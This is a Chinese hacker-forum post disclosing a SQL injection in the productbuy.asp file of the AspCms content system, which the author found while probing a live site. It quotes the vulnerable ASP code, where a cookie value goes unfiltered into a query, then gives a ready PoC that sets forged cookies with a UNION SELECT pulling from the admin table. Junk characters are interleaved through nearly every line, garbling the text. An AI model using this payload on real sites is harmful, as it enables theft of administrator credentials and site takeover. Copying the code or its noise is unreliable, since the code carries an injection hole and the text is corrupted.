好久没上土司了,上来一看发现在删号名单内.....
" @+ F& A7 o: ]1 q# W也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
! s, G/ K$ k& B) X) W) M/ m! r# M废话不多说,看代码:
( O+ H$ }) C) F: i3 G' B1 V6 l3 C; y
<%
2 ]/ j+ ?9 ]* b" o( l' R8 V& x" c; u: w9 ]) [) p
if action = "buy" then+ U/ S: Y5 D* t/ A
: Q4 M3 t% W9 ?6 c0 u
addOrder()
6 b; q6 f6 N3 n# k7 z8 H; |7 `' g
" B2 w) L+ U3 s1 Y' s* M# t2 A1 m. Velse
/ [$ k) i3 F* N4 ~6 Y% T$ o c: z& J& i$ {' a- C. Z/ w1 e0 d
echoContent()
2 V/ B, j/ ^) v) }. C6 l0 ^7 _$ L
1 L6 L& w8 }* j o8 O: |end if
5 Y# G* G3 A. Q4 Y4 f
% _! I3 w. n9 b8 k: q3 M3 s: F$ `: m c! b+ J+ Z3 R. C
6 H( {! ?/ X) d3 E! u+ l4 q& Q2 K……略过
# \4 x s8 x k) i( A) ~ m x9 E! i s+ M) d' w3 O) G
Q1 v7 q9 K6 N# O$ q1 M
! [) w9 w- R0 l! m) ?! x( |/ NSub echoContent()
; X n/ r, x0 P ^% {6 u0 {7 l- i9 r1 z2 y4 L4 |
dim id, J# o$ k+ J/ K) V" _0 X
& M! u& G, y2 _: g$ _0 N9 I
id=getForm("id","get")
' ]# x' G+ s) u0 f- Q3 Z! o8 u/ P; h r' _
' A+ e5 ^+ }4 X) Q" y6 z) w/ ^5 m6 \7 q
" V7 T! `3 k. b N9 E* l
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
' f% Y0 d( h5 N% a9 s) s7 x+ w- E4 \! ] H9 T1 E1 s* s
* ]- Y* l/ t% u; Y: B7 j7 k
% k* D" e! m1 x+ U/ m0 E ?; k
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")7 S4 P* ]* y- \1 r2 @( c% J3 g
# B3 D+ m- M$ h
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
* z6 N/ U1 H6 k* f6 x) a
" J1 S# X: P5 u8 G Dim templatePath,tempStr
1 J" K8 T9 u. Z( h7 z) `" Z* T4 y2 \9 H+ Y/ b6 o4 Y3 T6 ]
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
X/ u( k3 Y2 H9 p& _- v% K8 S' k, g6 w) q( G
2 T0 a- k! I- q7 Y0 q1 c
* `' h5 P. g+ X( x
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1") I, s2 `2 q/ E! I& v! V6 g& H
( r5 R1 q! z3 N) j# B
selectproduct=rsObj(0)
: y% B& l _4 P0 y! E
0 a# t+ ~. q% Z; ~& V) h
8 J" I X: J7 H
& Y7 b& J, G9 Q6 Y' M Dim linkman,gender,phone,mobile,email,qq,address,postcode. E& L( W$ F# L: g0 N$ h# D
" J. _1 m% K0 Z: i
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0' |" Y7 F& D' @. T
' C+ S( a4 d% S4 W' p if rCookie("loginstatus")=1 then 3 j4 @+ |# M( V% k4 g9 B
T/ V. V! K, l2 u+ Z set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")* j' b9 f4 |; b+ q
: Z" `1 M6 [' n+ x
linkman=rsObj("truename")6 O( ^" m' X1 T8 v. U3 w
- i+ n y2 e" H; [5 K, o# a4 N
gender=rsObj("gender")
, \, I9 o/ E+ h# N
; [1 c" v( h3 H phone=rsObj("phone")) _+ o$ ~. }* z6 ~# z) L
/ V" s7 p3 f" i0 o3 R" G% j$ J mobile=rsObj("mobile"): @! m4 ]5 I" j- N
% `9 s |/ V7 ~8 X, a email=rsObj("email")6 U- s! r$ o: j9 P' Y0 B: e
8 A- p6 ]- o8 M" m w' _ qq=rsObj("qq")/ Z5 \ _1 t n/ L6 S; }
3 H5 R3 P8 S' _9 s, T address=rsObj("address")
n' j/ n" F/ k5 w% t% [, t1 p: S6 a* f8 V
postcode=rsObj("postcode")
- _& }' z Q; W2 o K6 d. g; \0 d8 {: l& i; z7 }
else
; M, q. A! e0 Z% _4 R6 B) U. D- \# q3 X2 H
gender=1
: _- k' U7 _6 c8 j c9 o" ]6 d& o" t3 Q
end if
6 S3 N( V( ^" T- p+ c. o
& E" y/ _ K2 c* T3 D8 k rsObj.close()
7 z+ }( C) P# T0 n ?1 ^
0 v& E5 M# T& ?5 D; X + d4 }7 J' @: c. e+ J; e% w/ y
" l: V; F! T! i% P0 E
with templateObj 4 u7 v+ J( o( _+ Y6 v: f
$ @- h6 \' `$ G% x8 [- G
.content=loadFile(templatePath)
1 p" g8 i1 T' Y2 t' D
' A- G% `8 Y4 \' z+ u0 r) W: N .parseHtml()7 d8 U2 X% x. w8 }* H% c w# C
4 A3 |5 m4 C! J- S
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)) r0 W0 Z3 w% F) |+ [5 [; Z8 M
4 a( K" S5 ] Z) D
.content=replaceStr(.content,"[aspcms:linkman]",linkman)
$ o! E- Y6 f2 a/ m
. K- ?( ]* H: } .content=replaceStr(.content,"[aspcms:gender]",gender)
2 T' s; J, e. @' `/ L S. G! b) b3 P6 F
.content=replaceStr(.content,"[aspcms:phone]",phone) 4 s8 S8 t- R5 z$ b, {, p6 u
5 O( e$ i( I% Y" Z6 ~9 Y: a
.content=replaceStr(.content,"[aspcms:mobile]",mobile) ' C7 Z% e) J# @. L' q* X1 Z
; Y3 W8 ?6 C7 w7 i' E
.content=replaceStr(.content,"[aspcms:email]",email) * r! | Z( h4 o: |
9 ]9 F3 G$ l; }" [ .content=replaceStr(.content,"[aspcms:qq]",qq) 0 G9 N- e7 O4 {# ^& J; h- G0 M- f. [
8 q4 V9 ?2 v P* }$ a .content=replaceStr(.content,"[aspcms:address]",address)
& I" t( @. Q7 a6 `5 P9 p
# C' Q# |, C8 N! i6 t .content=replaceStr(.content,"[aspcms:postcode]",postcode)
3 z8 s3 x& n' L( C5 X# L/ x& a) \- A$ a, c
.parseCommon()
: p. j+ R1 ?/ V% D
1 X& J$ v! F* S. n( f, c echo .content * a) `5 ~" W* h* u
% C9 t$ ~1 m$ h end with$ y3 d x# Q7 q3 m' \8 ~6 h
. M9 {8 H2 ~% m4 x: l
set templateobj =nothing : terminateAllObjects
8 ]/ m2 c, K4 K8 T! B
+ A! |/ f6 ~& _. P9 @End Sub
3 O+ l$ g* y& d% k* T漏洞很明显,没啥好说的
8 l. M' x: T- ?poc:
) q A+ n- }" h. u3 z K6 G) g7 c3 d" A2 o* x& a
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子, }# M% H8 z* [# d( r; B8 t6 g
2 [. N. ~+ _/ f$ ~7 }& Z+ |$ G
|